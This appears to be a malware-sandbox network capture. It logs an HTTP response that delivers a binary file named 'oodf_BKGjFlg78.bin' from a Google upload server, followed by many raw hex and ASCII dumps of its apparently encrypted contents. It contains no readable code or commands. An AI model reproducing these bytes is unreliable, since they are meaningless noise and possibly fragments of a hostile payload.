2021-10-13 13:52:00 UTC	348	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdurnHR4ku9BkWgGYM7AsFZwXISvaoGU8LpImHAfncJQ_Qqtpy144ExRaPcOugjSiSUowkfGTAeePkIT-VFhBg Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="oodf_BKGjFlg78.bin";filename*=UTF-8''oodf_BKGjFlg78.bin Content-Length: 167488 Date: Wed, 13 Oct 2021 13:52:00 GMT Expires: Wed, 13 Oct 2021 13:52:00 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=vfJ+GA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-10-13 13:52:00 UTC	352	IN	Data Raw: 65 52 7e c8 bd a3 0c da 73 13 7c 05 bd d9 28 7e 01 64 b8 3b d0 7f cf 51 dc 99 26 b0 eb ac cf 92 82 64 85 80 cd 09 5e 97 32 4d b0 fe 61 76 2c 1c a4 43 39 fd ca da b2 10 64 8a d1 0b e2 e5 22 41 1e 9e ae aa d8 33 a2 91 7e 77 df eb ce 32 3f 1b 1c 86 1b 1d da b0 73 bb 59 6e fa b4 9e 1e 44 82 f0 bf 66 2d 31 ac 52 5c 11 c5 ed a0 44 29 ce cf 6d fb 36 fe 18 a0 75 ad 72 cc b9 38 89 d5 64 24 21 bb 57 af fa 24 b9 06 26 c9 54 ef 89 9d b7 c7 de ac 3e 80 fc 08 54 57 6f 1d 8d 38 07 23 74 46 df 44 6e 91 c0 33 65 b3 44 e2 46 67 02 b0 f2 c3 cf 73 0b 2f d5 83 56 1a f6 d7 f4 b3 4a 27 71 a1 74 94 84 e8 93 3c 19 40 3a 2d f9 f6 27 c7 2e 7c 02 99 fc 00 74 3b 28 37 cd 38 37 89 ab d1 29 78 ef 25 ce b4 8e d0 93 db c6 82 0e 22 88 ec 54 77 4e be e0 bc a6 2d c1 c9 2a 8c 0d 0e 87 f7 3d Data Ascii: eR~s\|(~d;Q&d^2Mav,C9d"A3~w2?sYnDf-1R\D)m6ur8d$!W$&T>TWo8#tFDn3eDFgs/VJ'qt<@:-'.\|t;(787)x%"TwN-*=
2021-10-13 13:52:00 UTC	356	IN	Data Raw: c6 a5 38 1b 15 5c 71 44 c7 5f af fe 16 5f d2 f1 a9 7b 85 d2 ab 36 1f fc 8a 9e 41 d8 07 7c de c7 c0 91 53 d7 0f 78 27 d3 56 e8 30 5a da a9 b1 42 2e 02 52 bf 4d 4e 18 3e 28 7b 56 e8 19 ee d7 68 da 79 dc 56 90 53 b5 06 73 25 38 a5 b4 99 f6 09 ef 5b e3 05 c4 86 96 26 2d 76 37 2d b6 e3 32 e0 68 ed 3e b9 52 40 92 33 80 54 f8 c7 04 f6 6a e1 82 13 18 10 40 0e 19 8b f3 48 91 e4 1c 25 ba e1 43 80 83 71 6a d7 c0 bf 35 15 7e 8a 70 e4 3c 91 cc 96 16 32 0f 51 f4 28 ba 9c d5 9f f4 69 2f 47 12 fa 7b 6a ef 9f 3f dc dd 42 83 fb 6f b1 8d b3 2c 15 ad ee b2 03 33 72 6f b7 85 0b 3e 57 17 92 90 06 19 54 24 41 dd 5d 43 54 12 7c 7f c8 1d b7 a7 ca ed 76 c3 09 5f a7 e3 85 d5 b6 d5 35 ac a2 c8 14 e2 85 51 cd 10 11 63 0e 5b f2 5c 66 43 f1 d9 25 87 23 4b c4 28 11 7f a5 1a 1d 17 b1 ac Data Ascii: 8\qD__{6A\|Sx'V0ZB.RMN>({VhyVSs%8[&-v7-2h>R@3Tj@H%Cqj5~p<2Q(i/G{j?Bo,3ro>WT$A]CT\|v_5Qc[\fC%#K(
2021-10-13 13:52:00 UTC	359	IN	Data Raw: 18 c0 c6 b1 da 9a 02 78 f3 12 c4 d8 d1 a5 a4 c9 53 6d a5 9b c1 22 c6 c5 04 18 ae 8f e2 79 b7 56 4e a1 e9 b2 2e 7c 0c 80 32 12 f2 b8 d4 e5 32 86 9b a2 64 ec 52 3b 44 1d 0f b0 f5 44 be f5 93 2c c8 30 13 cf ef af f4 74 f7 b3 53 08 7a 3a c1 4d a8 d6 10 86 5a 6b 05 4c 74 1b 10 04 86 8a 86 3c 85 5d e7 4e 96 5a 9e ff 4e 97 f9 4e 71 fa 82 6e 88 98 94 f7 98 69 96 cc 46 d8 b6 86 d7 c5 e0 74 49 ca 31 1d 8e d2 e1 4d 46 77 c8 f5 31 02 b4 f8 db 7d 41 db f4 3e 53 80 fb 77 5a 15 70 24 8e 4f 55 47 c1 85 17 e6 4b cb c6 1f f8 48 94 91 b2 9b b2 88 28 74 e3 20 42 bf ae 0d e5 1b d8 49 90 c9 15 ba b4 05 af 88 ec b0 61 6a dc a0 2e fc 18 4b ad f7 46 16 fd f7 d4 19 48 48 a7 8e e4 99 1a 6b 2c ab 7f ff 9e d5 a1 8e bb 4b d2 22 ff d1 da 16 0c 56 84 e1 07 7e 87 d8 79 42 63 be 27 d5 32 Data Ascii: xSm"yVN.\|22dR;DD,0tSz:MZkLt<]NZNNqniFtI1MFw1}A>SwZp$OUGKH(t BIaj.KFHHk,K"V~yBc'2
2021-10-13 13:52:00 UTC	363	IN	Data Raw: c9 01 e7 26 1d 35 64 0b 3c 70 ce 2a 9b f0 8b f8 21 66 7f dc 4f 34 f8 2c 30 15 d6 7b 66 ff 48 20 e1 9c fe 2f 63 e2 8b 24 52 a4 99 b0 f7 90 71 a3 89 ac 1f be ef 83 71 cd 7f 80 c3 a3 5e 1c 5d bb e2 d7 7f 49 de 70 2d 28 0b 23 92 8c 71 66 8c 96 44 0c 55 b7 f4 db 09 ed 2d d6 e1 3f 80 c3 c4 5b 03 8f 84 50 86 80 10 1a 4b 84 97 11 fd 40 32 40 fd 2c 9a c9 4d 54 11 9f 92 b5 4e 21 3a 30 4c 79 65 c4 59 d2 3e 08 d5 74 0e c9 4e 8a c3 a3 b6 e9 be e3 78 8e 19 e1 58 bc b8 d2 e6 5e 7a c9 47 5d b7 61 3e c4 2f 41 cd 14 9a 38 86 74 63 2f 59 62 9b c1 8b f5 3c 6e e5 85 a0 33 f7 37 dd fb 4e a6 ed 7e a8 44 bd 6d f3 40 f1 27 42 44 f9 18 ba 8e f6 db fe b4 7a 08 31 e8 6d b5 50 3f 54 41 6c 8b 98 a0 93 93 4b 3a df 79 fa c6 86 6f 19 65 7f ea 76 83 78 59 d7 fb 98 81 29 04 03 fd 8f 22 b5 Data Ascii: &5d<p*!fO4,0{fH /c$Rqq^]Ip-(#qfDU-?[PK@2@,MTN!:0LyeY>tNxX^zG]a>/A8tc/Yb<n37N~Dm@'BDz1mP?TAlK:yoevxY)"
2021-10-13 13:52:00 UTC	364	IN	Data Raw: 26 04 7a d5 b6 d5 06 f0 1a cc 9f 9f 79 62 94 08 d0 9c 06 d2 af a8 ed 1e 01 18 de 97 a2 ac 3b 28 11 7f 2e 66 a5 13 30 4f c1 9b 2b 66 ac ee db 76 5b a8 f7 d8 64 2f 60 62 40 0a 44 2c 98 ba b7 2c 18 b4 d0 d9 63 ff fb c7 d1 dc d8 99 13 39 cb 2b 23 72 81 2f 5c 03 f4 c5 6f 9c 5f 7b b0 2e a0 8d 79 06 89 e6 8f 43 ae 71 0b 0b 8d b7 69 a9 49 ae 52 5c fa c3 60 3b 44 29 ce cf e6 86 c2 3f e7 a8 f4 4a 8d cc b9 38 ba a9 dc 20 ee 6b fd 2a 24 51 4b db 86 92 aa a3 44 bc 68 f3 2f db df 3b 86 54 c8 ae 53 88 2c b8 99 4d 1a 29 20 38 94 f0 21 82 18 ee 9f 00 f2 86 bd e7 20 00 5d 1c 6f 4a c8 f2 c3 14 59 8a 00 80 73 e6 8a b1 80 8f 4b 78 d7 c3 89 f7 0b ab 4f 41 1e c0 7f bf 5c bb 02 89 ce 2c f8 9c 10 a2 f8 c1 1a 8a e0 34 0c 74 0a cf 4d 5c 18 12 77 14 6d 4a b1 60 59 a7 4a 7f 23 b4 95 Data Ascii: &zyb;(.f0O+fv[d/`b@D,,c9+#r/\o_{.yCqiIR\`;D)?J8 k*$QKDh/;TS,M) 8! ]oJYsKxOA\,4tM\wmJ`YJ#
2021-10-13 13:52:00 UTC	365	IN	Data Raw: 7a 5c c8 f2 0d e5 e0 f3 46 97 e5 b6 52 27 9d 1b b5 69 14 69 36 ac 82 d2 00 53 5d 37 c8 82 0c fb 0f 46 c9 1e cf 68 a3 38 fb 78 28 4f bb 83 02 fe 0b 83 ff 70 dd b1 dd 6a b8 1f 09 d3 58 b5 62 85 f4 07 11 4c b3 f9 75 63 53 85 a7 9a 84 6d c2 c6 37 1f 7f 4e 9a c4 18 73 76 b8 44 fc d7 0f a3 0c 30 52 25 1e 9c 3b 3c 59 95 f7 1e 5a 06 15 f7 38 bb 9d fe 5c 62 d3 17 6d fb 5a 64 e5 28 51 02 d6 51 3e 43 7b 77 68 4d 53 f0 f7 09 6c 9f ef 5a 9a db 55 73 a6 9a b4 c1 86 d1 f2 b6 e3 98 32 31 17 ac 1a 76 7c dc bd 33 6e f4 e7 a4 7a 43 4e d7 05 e6 21 8b f3 48 56 a1 e4 14 8a e1 43 47 c6 a9 58 e7 f1 8d 53 d2 3b 56 70 e4 fb d4 1c a4 26 03 39 37 33 6d 6e 9c d5 58 b1 99 18 47 12 fa bc 2f 0f ad 0f ec e5 24 44 be 8b b1 8d 5b ef 65 ac ee 31 c7 3f f7 af c3 8f 80 73 5f d0 d3 f4 07 19 54 Data Ascii: z\FR'ii6S]7Fh8x(OpjXbLucSm7NsvD0R%;<YZ8\bmZd(QQ>C{whMSlZUs21v\|3nzCN!HVCGXS;Vp&973mnXG/$D[e1?s_T
2021-10-13 13:52:00 UTC	367	IN	Data Raw: 10 6d da 18 5f 3a be 0d 69 19 ec 08 66 b5 2d c1 4a be c5 52 50 90 7d d9 01 8a 6b 54 5b 66 63 d1 24 86 7a f9 7b 40 79 ff 86 a3 45 55 23 bb 43 3c 4b fe 25 a2 f6 47 8c 81 9e 7b 4d 75 5f 1d 59 cb 88 2e 9f 6a 8f d1 e7 05 ff 88 c7 36 88 1a 76 86 d7 90 d7 d1 f0 7a d4 ee 50 30 73 ec aa ba 35 d2 4a 46 76 6f 97 48 54 08 36 55 0e ba b8 fc 80 8c e5 2b 89 44 fb 50 bd 77 3c f6 fa 49 a9 fb 76 a0 b7 a0 31 38 68 1b 04 48 67 82 cc bd 91 9a 09 d1 0d b9 fd f1 4c 15 09 9b 99 b1 91 04 16 eb 99 75 6a 30 82 15 7b fc f6 18 63 0a 6c 61 04 be 3f e8 fa 2d 09 8b 83 e6 3a 61 e8 fd 15 44 c3 8d 4b 8c 5c 3f 84 14 11 03 ef fb 2a 0e 2e 7c cc 9a e9 44 7f 85 61 1b 91 0f 4d 0a 0c 68 0a 94 fa 80 5e de 0f 2d eb 5c ce 00 c4 ad f8 7c 5d e3 9f ba a4 8a 70 3d c6 6e 75 a1 4d 69 47 6b 6b 7e b9 1f d4 Data Ascii: m_:if-JRP}kT[fc$z{@yEU#C<K%G{Mu_Y.j6vzP0s5JFvoHT6U+DPw<Iv18hHgLuj0{cla?-:aDK\?*.\|DaMh^-\\|]p=nuMiGkk~
2021-10-13 13:52:00 UTC	368	IN	Data Raw: c6 8d 90 e7 08 46 a6 06 41 7a 04 75 19 54 a7 85 fd d8 83 20 7a f1 2a 24 4f 3c f2 52 85 76 c2 09 5f 2a 66 f5 2e 49 2a 65 c6 a3 45 59 7e d4 03 9b f8 fc 21 0f 5b 71 98 7a c6 31 ac 64 0c a6 33 3f d7 ee f2 29 1f 6d ec 4e 53 6f c8 c3 a4 45 b3 43 ff 0e 5f 43 9d af 27 d0 5d cf 05 40 2f 1d 44 b7 a7 9d 47 77 be 98 b3 b4 ca 92 dc ac 3b ba 75 a5 4b 5f 6e 81 7d b4 6b a1 b8 f7 1b 18 aa 1d 98 a1 8c 0f 84 21 3a 1a 93 8a 71 bb 01 34 b7 e5 53 2d ac db da 95 ce ed a0 2e 29 ba c9 e0 b6 c6 af f3 a4 f8 f8 8a 9e ea d0 a6 b6 65 24 ac 60 e1 cb fe f8 b0 fb 07 71 3d a3 00 a3 e3 c5 b7 89 f6 10 d0 66 33 4f 0a 18 ad 6b 66 4d 72 29 ef 7b 0c 9e e0 17 99 5b 58 80 28 47 ae 39 ff e2 a2 9f ab 62 78 30 67 1b d2 d7 f4 3a cc 67 7a a1 09 fd 3f 95 ab 3b 48 8d c3 25 2c e0 1f c0 7f 63 c8 11 fd b7 Data Ascii: FAzuT z$O<Rv_f.I*eEY~![qz1d3?)mNSoEC_C']@/DGw;uK_n}k!:q4S-.)e$`q=f3OkfMr){[X(G9bx0g:gz?;H%,c
2021-10-13 13:52:00 UTC	369	IN	Data Raw: 9c 1e b1 8d ed ed 81 53 a6 4a 5e 34 52 25 76 76 cf 46 0b 63 de cb 0f 3c eb 86 be 08 ea bd e7 9e 25 92 a8 16 b7 05 df 04 e4 bf a0 32 1c fd 8e f6 79 45 34 d7 ff e7 5f 99 c9 56 c5 9e e4 3b 1c 79 4f 69 89 11 37 d8 1c 19 07 53 df 79 29 32 6c a2 55 1c d1 ce dd 79 33 19 31 0d 60 1c c7 a5 3b db 96 98 61 79 3b 5c af fe 61 60 82 7c 3c db 7e 2d 54 61 4d 14 38 c4 40 d8 84 b8 d2 4a 95 71 de 52 af 83 d8 2c ef fc 34 5a da fb 38 1f ce c5 17 5b 4e 4e 18 3e a1 3e be 61 44 02 b1 e1 97 89 55 0b 62 da e8 f0 fa 78 c2 5a 62 c7 a9 52 64 be be c6 01 57 31 8f eb 84 23 01 ac 78 67 6b 84 6e d2 91 04 cb e7 3b 0b d2 58 cc 04 f6 3d d2 7d 7b ef 4e 54 c2 4e dc a3 c5 df f8 4d ac c7 11 ca fd 77 99 9c 20 c0 bf b6 d1 6a 03 35 18 07 56 b9 9e 49 01 cf 0f 7f cd e7 5f ec 21 84 62 2f 47 67 f0 bc Data Ascii: SJ^4R%vvFc<%2yE4_V;yOi7Sy)2lUy31`;ay;\a`\|<~-TaM8@JqR,4Z8[NN>>aDUbxZbRdW1#xgkn;X=}{NTNMw j5VI_!b/Gg
2021-10-13 13:52:00 UTC	371	IN	Data Raw: 1d f0 c4 aa 00 17 1e c0 7e 34 20 03 c1 c8 15 1c 79 7f ed a2 f8 c1 fb d2 f5 b5 55 41 fd 03 e6 81 2a 4e c7 eb 6d 20 b1 66 48 c3 1f 33 75 24 58 d2 3e 9b 92 f2 57 0f cb 9c 34 36 4c 00 7f 2e 13 49 53 d7 a2 ae 6d a3 71 96 73 1e de 7e a2 f7 93 e3 e0 b2 02 57 c9 38 92 7a 28 36 a9 61 da 03 f5 06 2d 4d 22 aa 34 59 1f f2 08 b1 86 a6 f1 78 60 fd 92 d5 36 5d 84 92 2c e9 bd 35 43 53 e6 aa 39 a6 88 fd 24 c2 e4 72 7f 97 51 e3 59 d3 d4 3d d7 16 bc 84 c4 e8 34 8e 92 9e df d1 47 2c 06 7d 2f e0 82 26 58 e2 c7 d5 90 55 a0 22 5c 4b a9 32 5e 01 0d ab 03 8d f4 cf ed 56 65 03 8a 95 ca 4b d6 12 56 bd 1f 7e 4d 60 fa fd a0 bd f5 93 63 94 b3 91 24 61 2f 09 02 8e 58 11 41 e8 15 a7 27 55 29 6c 48 4c e8 c9 ff ba f9 ad 76 2c 7a c8 18 9f 72 fd 97 6a a5 52 db 42 46 0c 69 a5 e7 2a 09 25 95 Data Ascii: ~4 yUANm fH3u$X>W46L.ISmqs~W8z(6a-M"4Yx`6],5CS9$rQY=4G,}/&XU"\K2^VeKV~M`c$a/XA'U)lHLv,zrjRBFi%
2021-10-13 13:52:00 UTC	372	IN	Data Raw: 0d f4 28 ba 5b 90 23 da 69 4a 47 d5 bf bb 12 ef fa 3f ba 54 0f 47 13 30 e0 8c b3 1f dc c7 d8 e3 8e 66 f4 3d 70 00 77 c1 a8 e8 bc 90 62 19 93 61 c1 b1 5d 2f 54 74 f5 32 4c f5 8b f6 cb ed fb 87 32 a0 24 27 b9 55 8e e4 40 c4 64 c8 14 5b 84 51 cd 10 91 5b 20 2f b5 1d 2e c0 08 d7 57 73 75 21 cc a5 54 c3 f5 97 90 6b 4e 53 c1 ca c3 ff 74 b3 43 f1 5e 6b 6e 5c 53 a2 93 ed b3 ef a9 ad 7b 45 3a 58 07 c0 01 da 67 3e 38 cf 68 29 d7 0d 9f b9 b0 ca 98 e5 42 6f 12 80 3f f9 85 76 37 ef bb e4 54 75 ef 2b fc 20 4e 1a 97 b3 13 83 f0 3c a2 25 da 00 df c9 61 3a 12 5f 17 7b 26 a4 20 fa 36 7d dc a8 f0 6d 07 54 e6 80 35 d5 64 24 74 2f 08 fc 39 1d f8 34 8c 86 7e 5a 15 bf 18 22 22 6f e3 0f 71 4c c3 72 5c b6 a9 45 66 a5 16 79 aa 64 8f 30 ec ca ee 56 11 83 42 47 2c fb 2c 66 92 e2 90 Data Ascii: ([#iJG?TG0f=pwba]/Tt2L2$'U@d[Q[ /.Wsu!TkNStC^kn\S{E:Xg>8h)Bo?v7Tu+ N<%a:_{& 6}mT5d$t/94~Z""oqLr\Efyd0VBG,,f
2021-10-13 13:52:00 UTC	373	IN	Data Raw: 7c 4d 5d 4b 13 cb cc 1c 9c 91 80 6e 25 93 be 4a f7 51 ec db 7f 0f 16 65 81 7e a6 4c 33 3a 30 e1 71 3d 1d 09 ef fb 4c 69 47 7b 17 55 b9 1f 06 d8 79 1b 6e 0b 21 b9 48 bc 49 97 14 bb 40 29 70 20 82 f8 f4 50 48 b7 05 b4 ab f6 07 f2 f4 27 56 27 e1 8d 55 bf 9c 75 17 5f 99 e9 07 36 67 cd bf b2 f7 c2 01 ff 63 6a 72 0b 30 7b 92 8c 42 4f 36 bc d2 fc 6e ab 4e 74 dd cd 49 8e 21 93 40 c6 28 b5 73 ee a3 8e 15 91 b7 a8 0e e9 a0 84 19 68 8a 7a 2d 28 f2 3b cf 4a c0 ca 3d 5a bf 3d 03 c5 19 08 eb 32 2d ac 3f 01 63 4d 52 51 2e 69 45 2e 02 d7 7f 39 38 4e b3 98 7b 76 e8 19 65 50 04 d1 79 dc db d8 52 3c 89 1f 2e 38 a5 37 61 e6 7f c2 d8 9d 55 c4 f2 b1 70 7a 9e e0 2a b6 e3 b1 24 60 6e 80 11 db 40 92 33 f4 40 ae 90 c3 70 c2 68 82 13 18 10 40 0e f1 51 f1 48 91 67 d8 2d 39 df 43 f4 Data Ascii: \|M]Kn%JQe~L3:0q=LiG{Uyn!HI@)p PH'V'Uu_6gcjr0{BO6nNtI!@(shz-(;J=Z=2-?cMRQ.iE.98N{vePyR<.87aUpz*$`n@3@ph@QHg-9C
2021-10-13 13:52:00 UTC	374	IN	Data Raw: 16 42 35 d7 c2 29 47 cb 7b e4 1b 5f e3 90 c9 3f 8a 0b f8 61 91 f5 b3 c1 b4 75 ac 09 f2 38 37 a6 51 48 85 8e d2 55 41 e1 91 80 e6 4a 03 6c 52 80 fa 95 f5 ef a2 ae 92 79 e8 98 30 cd 3c c6 ec 41 0f d9 53 cb 1c b5 14 ea 60 e0 62 8d ec 2c ad 3e 82 96 03 e4 84 a3 62 cb 7f 2c 09 c2 04 2c 85 0f 4d 5c 61 34 a6 dc 9b a2 a5 fe 8b 20 81 5d f1 74 c8 b6 b0 02 da de c3 0e 89 d7 c9 2a aa 5a 50 1e 59 48 cf 9c 3c 38 d4 5a 02 57 b8 ff 3c 0f 87 1c 12 72 25 6f 5c 84 f7 a8 64 be b8 fd fc 52 a6 34 f1 de 15 17 a9 3e 70 15 97 b0 8b 02 06 e0 41 b6 39 53 84 cb 3b 75 74 7a 39 74 1d 78 c7 c4 47 aa 20 a7 b1 50 d7 4e 20 3c 52 2e ee 8c a6 54 4e 65 e1 27 b3 ba 89 79 50 41 84 ee e6 84 be 98 56 db 99 10 6d 25 f3 b2 97 8a 8f c7 10 58 84 eb 87 3b 07 85 ef c3 f4 74 f7 38 f2 fc a0 fc 44 70 09 Data Ascii: B5)G{_?au87QHUAJlRy0<AS`b,>b,,M\a4 ]t*ZPYH<8ZW<r%o\dR4>pA9S;utz9txG PN <R.TNe'yPAVm%X;t8Dp
2021-10-13 13:52:00 UTC	376	IN	Data Raw: 26 87 8c eb 0e b7 6e 0c 3a 67 bb e1 c8 f5 8b fc 27 1b 91 32 60 b1 2c e2 71 e0 3c 91 41 d3 1a 62 59 b9 a8 08 bb 9c 56 5b d4 ec ef 48 9a 02 7b 6a ef 14 b9 7c d6 42 83 ac 07 46 d3 a7 e0 46 fe be 3f 7d 2f 25 a8 f2 51 57 3e 32 17 55 d5 de 61 54 54 41 1a 18 9f 38 12 13 7f 0f 58 57 d5 ca 88 76 04 4c bb d5 e3 ab d5 71 90 dd c9 a2 b0 14 25 c0 bd a8 10 11 63 e6 b3 2c 5c 66 c0 35 cd 1e 44 57 4c 4f 65 1d 2c f4 e5 cd 7d f1 21 ab ff d4 99 d8 e1 11 9a 01 26 e6 19 22 aa 33 64 34 a8 f9 9e bb c8 e2 dc 4a 69 05 1c db b7 7d 0f 6b 62 97 4d ae 30 f7 b6 c2 6e 81 d0 18 03 c7 b9 30 dd 2c cd 90 74 d9 b6 b5 8f 1f 6d 96 4b b8 cb bc eb f0 cd 66 4b b8 e9 ae b4 88 f8 ed a0 17 a4 8b 1b 3d 76 bb 9e e5 5f 8a fc 9a e4 fc 39 31 5e f2 84 24 a4 ed c9 51 b1 b1 66 54 22 07 f4 ac d8 3d af b7 5c Data Ascii: &n:g'2`,q<AbYV[H{j\|BFF?}/%QW>2UaTTA8XWvLq%c,\f5DWLOe,}!&"3d4Ji}kbM0n0,tmKfK=v_91^$QfT"=\
2021-10-13 13:52:00 UTC	377	IN	Data Raw: 0b 6b 2f 09 06 85 9d e7 be 17 ae 15 41 c8 dd 12 73 a3 85 0a b6 f0 93 05 d5 4b e7 a2 48 9e 72 25 f0 6a a5 ea 4b 22 99 cc 0c 00 97 80 6e 27 2d 51 76 06 ae 9e d5 4f da b6 17 55 fe 76 8c cd 52 9c 6f e4 c9 b0 1e fa 39 08 95 9e 70 ce a6 47 e0 7a 4c 99 8a e8 7e 04 54 96 8c ca 27 33 66 25 40 c0 de 7d 22 10 74 10 5f 1a 6e 6b a6 d5 bb 69 1f 45 ae c7 df bd b7 13 7c 92 1c 29 d3 e6 43 e6 e2 47 25 3c 57 68 04 9c 95 cb d9 8e 35 93 0f e8 4d eb 68 c4 30 e7 2e 26 d9 ca cc fe 66 e5 5f 85 ca fb 63 90 f0 01 b2 c9 52 a7 51 01 e9 0d b8 88 fa 93 53 0a ab 36 9c 38 82 ce a9 f5 de 7c de 44 04 99 d6 17 7b 6b ac a6 5a 82 24 9d 9c b1 b3 42 2e 02 ba f9 25 4f 18 d5 9d f6 d3 10 e7 11 28 38 b0 03 8f be 34 8b b5 06 f0 e1 30 f5 5c 62 2e 09 ef d8 27 0d 41 46 e2 35 a6 03 3b 47 a2 24 74 f8 6b Data Ascii: k/AsKHr%jK"n'-QvOUvRo9pGzL~T'3f%@}"t_nkiE\|)CG%<Wh5Mh0.&f_cRQS68\|D{kZ$B.%O(840\b.'AF5;G$tk
2021-10-13 13:52:00 UTC	378	IN	Data Raw: 64 45 ed be 93 2c 8a 35 26 a8 59 fc 03 20 70 b8 0b 3f 23 ae 9a d3 c9 87 c9 29 af 5c 06 8b d3 09 50 87 ba 23 aa 75 cd 98 0b 74 a3 69 3c ee 18 e5 bc 9f 3c a3 9b 77 e5 30 84 ee 85 cd d8 9c 31 75 70 ba d4 8e 1b 4b 97 88 c4 b9 42 b0 ee 84 fb 81 be 06 c0 89 c2 08 35 38 1c 50 0f fe 64 58 e5 55 e5 e1 44 36 2e c3 50 56 3d f4 e0 02 72 f0 7f c9 5c df 6b a3 97 4e fd d1 63 6e 7b 78 0f 6d d6 20 8b da 8a c7 41 14 10 1c a2 83 c0 ad 4a 57 8c 22 83 1f 41 15 6c 1e 42 ba 6d 47 1d 0d 0f 3a cb 18 d7 32 c6 13 9a ee 81 2a 09 85 35 4c bb 1e 1a 2e fc e2 6e 5c ef c0 88 07 ea 82 cb 8f a6 ee ff fe d1 fd d6 92 50 53 10 f8 01 21 3f 02 36 a3 fd b0 41 3c e0 eb 26 15 db c4 70 4b 33 67 9b a0 d4 62 a1 2c ac 7d d4 78 5a fc 88 48 d2 72 ae 0a 03 11 ad 0b e7 8a ac 64 8d ba 3a d9 ae 0a 1a 75 1b Data Ascii: dE,5&Y p?#)\P#uti<<w01upKB58PdXUD6.PV=r\kNcn{xm AJW"AlBmG:2*5L.n\PS!?6A<&pK3gb,}xZHrd:u
2021-10-13 13:52:00 UTC	379	IN	Data Raw: 09 41 70 e3 23 1e b6 69 70 75 b4 b9 9d 60 87 3a d1 52 50 92 33 e8 54 f8 c6 04 9c 6a b6 45 15 18 10 40 0e de ce ff 48 91 e5 1c cd 21 d0 42 80 00 b5 7e 5e c6 3a f5 61 24 01 8f 6f 79 9d 47 98 7c 32 5f 00 9e 2d ed 74 4a 8d f5 69 ac 83 06 c7 7f 6a ef 5f 4a 9f 56 45 eb fb ef b1 8d 3e 79 19 ff b8 e2 54 db f0 76 b6 85 80 7b 5b 7d 96 95 06 19 55 24 29 dd 4d 43 54 42 16 7f 9f da b1 a7 ca ed 76 4a 4c 53 4f a2 b4 d4 b6 56 f1 84 2b ce 91 22 f0 f9 92 23 d1 3d 53 98 77 9c 1f 61 7a ce 4d 87 a3 4b c4 a5 5c 73 f4 4c 4f 40 59 97 27 9a 2b e5 e3 a6 1c b5 9c 67 e7 19 af 14 93 c7 96 94 23 ab f0 08 bb a5 5e 33 d3 c8 29 3a 80 ce e2 27 53 9a b6 3b ea 02 ae 58 a5 15 51 b7 92 32 1b 1b 30 ae c6 96 ac 7d c3 a9 19 41 f0 4b 7f d8 83 c7 1c e4 66 7e 31 6b 17 ac 68 c5 9e a0 83 6c 3a bb 6d Data Ascii: Ap#ipu`:RP3TjE@H!B~^:a$oyG\|2_-tJij_JVE>yTv{[}U$)MCTBvJLSOV+"#=SwazMK\sLO@Y'+g#^3):'S;XQ20}AKf~1khl:m
